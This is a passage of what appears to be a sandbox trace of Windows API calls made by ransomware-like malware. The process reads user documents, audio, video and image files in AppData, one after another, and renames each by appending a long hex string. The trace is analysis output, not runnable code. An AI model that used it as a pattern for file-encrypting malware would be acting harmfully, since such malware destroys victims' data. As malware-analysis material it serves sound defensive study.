ReturnLength=0x72aff5c | out: ObjectInformation=0x77a8fc8, ReturnLength=0x72aff5c) returned 0x0 [0164.723] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Zw7NPqE30QDSa5q.ods", lpString2=".1D9F9C431BA886C0FB81E8A84C73B9E00239AE36F4E6A900EEEEAEB7A7CAA555" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Zw7NPqE30QDSa5q.ods.1D9F9C431BA886C0FB81E8A84C73B9E00239AE36F4E6A900EEEEAEB7A7CAA555") 
returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Zw7NPqE30QDSa5q.ods.1D9F9C431BA886C0FB81E8A84C73B9E00239AE36F4E6A900EEEEAEB7A7CAA555" [0164.723] GetProcessHeap () returned 0x270000 [0164.723] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x132) returned 0x4262c98 [0164.724] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x72aff4c, FileInformation=0x4262c98, Length=0x132, FileInformationClass=0xa) returned 0x0 [0164.726] CloseHandle (hObject=0x5e4) returned 1 [0164.730] GetProcessHeap () returned 0x270000 [0164.733] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x77a8f18 | out: hHeap=0x270000) returned 1 [0164.753] RtlInterlockedCompareExchange64 () returned 0x1 [0164.753] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.851] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0164.851] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.856] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x74c20b8, ReturnLength=0x72aff5c) returned 0x0 [0164.858] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\-MDlQjdBDlw2Y.m4a", lpString2=".7CD5FF3C58ED8A655B80F1CE9D7D1C7AAA8700A476618B84BF9A730DAD97786C" | out: 
lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\-MDlQjdBDlw2Y.m4a.7CD5FF3C58ED8A655B80F1CE9D7D1C7AAA8700A476618B84BF9A730DAD97786C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\-MDlQjdBDlw2Y.m4a.7CD5FF3C58ED8A655B80F1CE9D7D1C7AAA8700A476618B84BF9A730DAD97786C" [0164.858] GetProcessHeap () returned 0x270000 [0164.858] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x128) returned 0x425dc90 [0164.858] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x72aff4c, FileInformation=0x425dc90, Length=0x128, FileInformationClass=0xa) returned 0x0 [0164.860] CloseHandle (hObject=0x598) returned 1 [0164.865] GetProcessHeap () returned 0x270000 [0164.867] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0164.867] RtlInterlockedCompareExchange64 () returned 0x1 [0164.867] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.870] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0164.871] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.873] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x74c20b8, ReturnLength=0x72aff5c) returned 0x0 [0164.875] lstrcatW (in: 
lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\3lBzAWDiAW5xAw.docx", lpString2=".B962ECC40E92BC2E1E11841FF2669A2FE94D6D03B0D6CB9AAE9AB8E90001E532" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\3lBzAWDiAW5xAw.docx.B962ECC40E92BC2E1E11841FF2669A2FE94D6D03B0D6CB9AAE9AB8E90001E532") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\3lBzAWDiAW5xAw.docx.B962ECC40E92BC2E1E11841FF2669A2FE94D6D03B0D6CB9AAE9AB8E90001E532" [0164.875] GetProcessHeap () returned 0x270000 [0164.875] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x425ddc8 [0164.875] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x72aff4c, FileInformation=0x425ddc8, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0164.877] CloseHandle (hObject=0x598) returned 1 [0164.878] GetProcessHeap () returned 0x270000 [0164.880] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0164.880] RtlInterlockedCompareExchange64 () returned 0x1 [0164.880] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.884] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0164.884] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.886] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, 
ReturnLength=0x72aff5c | out: ObjectInformation=0x74c20b8, ReturnLength=0x72aff5c) returned 0x0 [0164.887] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\4r9qEg53tKJmZlc.mp3", lpString2=".B2723CF98899FC98DF1DD5D8D0963C553B337A8FF4CA28DD38BD1BFAD1BAE67B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\4r9qEg53tKJmZlc.mp3.B2723CF98899FC98DF1DD5D8D0963C553B337A8FF4CA28DD38BD1BFAD1BAE67B") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\4r9qEg53tKJmZlc.mp3.B2723CF98899FC98DF1DD5D8D0963C553B337A8FF4CA28DD38BD1BFAD1BAE67B" [0164.887] GetProcessHeap () returned 0x270000 [0164.887] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x425df00 [0164.887] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x72aff4c, FileInformation=0x425df00, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0164.889] CloseHandle (hObject=0x598) returned 1 [0164.894] GetProcessHeap () returned 0x270000 [0164.896] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0164.896] RtlInterlockedCompareExchange64 () returned 0x1 [0164.896] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.901] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0164.901] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.906] NtQueryObject 
(in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x74c20b8, ReturnLength=0x72aff5c) returned 0x0 [0164.908] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\6KGcivaX3av8lNTw.mp3", lpString2=".F75572D5015D966032051ACCD091DA0AD7A7A6303C1CC5F249D8D285F19CF941" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\6KGcivaX3av8lNTw.mp3.F75572D5015D966032051ACCD091DA0AD7A7A6303C1CC5F249D8D285F19CF941") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\6KGcivaX3av8lNTw.mp3.F75572D5015D966032051ACCD091DA0AD7A7A6303C1CC5F249D8D285F19CF941" [0164.908] GetProcessHeap () returned 0x270000 [0164.908] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12e) returned 0x425e038 [0164.908] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x72aff4c, FileInformation=0x425e038, Length=0x12e, FileInformationClass=0xa) returned 0x0 [0164.910] CloseHandle (hObject=0x598) returned 1 [0164.916] GetProcessHeap () returned 0x270000 [0164.917] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0164.917] RtlInterlockedCompareExchange64 () returned 0x1 [0164.917] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.922] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0164.923] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: 
lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.924] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x74c20b8, ReturnLength=0x72aff5c) returned 0x0 [0164.926] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\9evL6_piVJixL3I.wav", lpString2=".501C4EF0A4D0439F4CDB1B529ED2065ACF425C20940106A6A5EB8E3FE8463524" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\9evL6_piVJixL3I.wav.501C4EF0A4D0439F4CDB1B529ED2065ACF425C20940106A6A5EB8E3FE8463524") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\9evL6_piVJixL3I.wav.501C4EF0A4D0439F4CDB1B529ED2065ACF425C20940106A6A5EB8E3FE8463524" [0164.926] GetProcessHeap () returned 0x270000 [0164.926] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x425e170 [0164.926] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x72aff4c, FileInformation=0x425e170, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0164.937] CloseHandle (hObject=0x598) returned 1 [0164.942] GetProcessHeap () returned 0x270000 [0164.943] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0164.944] RtlInterlockedCompareExchange64 () returned 0x1 [0164.944] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.947] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x2200, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0164.948] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, 
lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.949] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x74c20b8, ReturnLength=0x72aff5c) returned 0x0 [0164.950] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ahtk.mp3", lpString2=".0E45E31918F226F3EDF19A8E05901AF07C08E135E34B2A35F1FAAB1468B38F1A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ahtk.mp3.0E45E31918F226F3EDF19A8E05901AF07C08E135E34B2A35F1FAAB1468B38F1A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ahtk.mp3.0E45E31918F226F3EDF19A8E05901AF07C08E135E34B2A35F1FAAB1468B38F1A" [0164.950] GetProcessHeap () returned 0x270000 [0164.950] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x116) returned 0x42762d8 [0164.950] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x72aff4c, FileInformation=0x42762d8, Length=0x116, FileInformationClass=0xa) returned 0x0 [0164.952] CloseHandle (hObject=0x598) returned 1 [0164.957] GetProcessHeap () returned 0x270000 [0164.959] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0164.959] RtlInterlockedCompareExchange64 () returned 0x1 [0164.959] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.963] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x5200, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) 
returned 1 [0164.963] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.966] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x74c20b8, ReturnLength=0x72aff5c) returned 0x0 [0164.967] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\atQPmg.avi", lpString2=".27BCC0055D90C9FCB86794D535F3916B27B9115E75F22005CB1D3EA9FA55C279" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\atQPmg.avi.27BCC0055D90C9FCB86794D535F3916B27B9115E75F22005CB1D3EA9FA55C279") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\atQPmg.avi.27BCC0055D90C9FCB86794D535F3916B27B9115E75F22005CB1D3EA9FA55C279" [0164.967] GetProcessHeap () returned 0x270000 [0164.967] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11a) returned 0x4276400 [0164.967] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x72aff4c, FileInformation=0x4276400, Length=0x11a, FileInformationClass=0xa) returned 0x0 [0164.973] CloseHandle (hObject=0x598) returned 1 [0164.976] GetProcessHeap () returned 0x270000 [0164.978] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0164.978] RtlInterlockedCompareExchange64 () returned 0x1 [0164.978] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.983] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, 
lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0164.983] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.985] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x74c20b8, ReturnLength=0x72aff5c) returned 0x0 [0164.986] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\E0cfMGggco.flv", lpString2=".66BE4B6D06DB210EE992C7ADC3EDEDA5BB39811410B8DB5E58C2C1B3F50E5E0C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\E0cfMGggco.flv.66BE4B6D06DB210EE992C7ADC3EDEDA5BB39811410B8DB5E58C2C1B3F50E5E0C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\E0cfMGggco.flv.66BE4B6D06DB210EE992C7ADC3EDEDA5BB39811410B8DB5E58C2C1B3F50E5E0C" [0164.986] GetProcessHeap () returned 0x270000 [0164.986] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x122) returned 0x425e2a8 [0164.986] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x72aff4c, FileInformation=0x425e2a8, Length=0x122, FileInformationClass=0xa) returned 0x0 [0164.988] CloseHandle (hObject=0x598) returned 1 [0164.993] GetProcessHeap () returned 0x270000 [0164.995] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0164.995] RtlInterlockedCompareExchange64 () returned 0x1 [0164.995] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.998] 
ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x4800, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0164.999] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0165.000] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x74c20b8, ReturnLength=0x72aff5c) returned 0x0 [0165.001] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\I0uQgvKvNStKM1d2e.pdf", lpString2=".9F3FC7B0039AB0271A8208F31AC4ECC3E2AC19ECBC95F8E192EAEB3A70C5540D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\I0uQgvKvNStKM1d2e.pdf.9F3FC7B0039AB0271A8208F31AC4ECC3E2AC19ECBC95F8E192EAEB3A70C5540D") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\I0uQgvKvNStKM1d2e.pdf.9F3FC7B0039AB0271A8208F31AC4ECC3E2AC19ECBC95F8E192EAEB3A70C5540D" [0165.001] GetProcessHeap () returned 0x270000 [0165.001] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x130) returned 0x741c1d0 [0165.002] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x72aff4c, FileInformation=0x741c1d0, Length=0x130, FileInformationClass=0xa) returned 0x0 [0165.004] CloseHandle (hObject=0x598) returned 1 [0165.007] GetProcessHeap () returned 0x270000 [0165.008] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.008] RtlInterlockedCompareExchange64 () returned 0x1 [0165.008] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | 
out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0165.013] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x4600, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0165.013] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0165.015] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x74c20b8, ReturnLength=0x72aff5c) returned 0x0 [0165.017] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\ib4hVk.png", lpString2=".E29D27863BBF8AA79B1ABB87FA56098938ECE859DF032C7FBFD8F1DB2AD25546" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\ib4hVk.png.E29D27863BBF8AA79B1ABB87FA56098938ECE859DF032C7FBFD8F1DB2AD25546") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\ib4hVk.png.E29D27863BBF8AA79B1ABB87FA56098938ECE859DF032C7FBFD8F1DB2AD25546" [0165.017] GetProcessHeap () returned 0x270000 [0165.017] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11a) returned 0x4276528 [0165.017] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x72aff4c, FileInformation=0x4276528, Length=0x11a, FileInformationClass=0xa) returned 0x0 [0165.019] CloseHandle (hObject=0x598) returned 1 [0165.023] GetProcessHeap () returned 0x270000 [0165.024] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.024] RtlInterlockedCompareExchange64 () returned 0x1 [0165.024] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, 
lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0165.041] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x5800, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0165.041] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0165.045] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x74c20b8, ReturnLength=0x72aff5c) returned 0x0 [0165.046] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\MbOel2sTiSRFkd2I.png", lpString2=".13AA4480DFA8DBE0EA40B9D57611F0F3FF0737D7B87F8E999AE00FC8E66C5A45" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\MbOel2sTiSRFkd2I.png.13AA4480DFA8DBE0EA40B9D57611F0F3FF0737D7B87F8E999AE00FC8E66C5A45") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\MbOel2sTiSRFkd2I.png.13AA4480DFA8DBE0EA40B9D57611F0F3FF0737D7B87F8E999AE00FC8E66C5A45" [0165.046] GetProcessHeap () returned 0x270000 [0165.046] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12e) returned 0x741c308 [0165.046] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x72aff4c, FileInformation=0x741c308, Length=0x12e, FileInformationClass=0xa) returned 0x0 [0165.049] CloseHandle (hObject=0x598) returned 1 [0165.053] GetProcessHeap () returned 0x270000 [0165.055] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.057] 
RtlInterlockedCompareExchange64 () returned 0x1 [0165.058] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0165.117] ReadFile (in: hFile=0x58c, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0165.117] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, 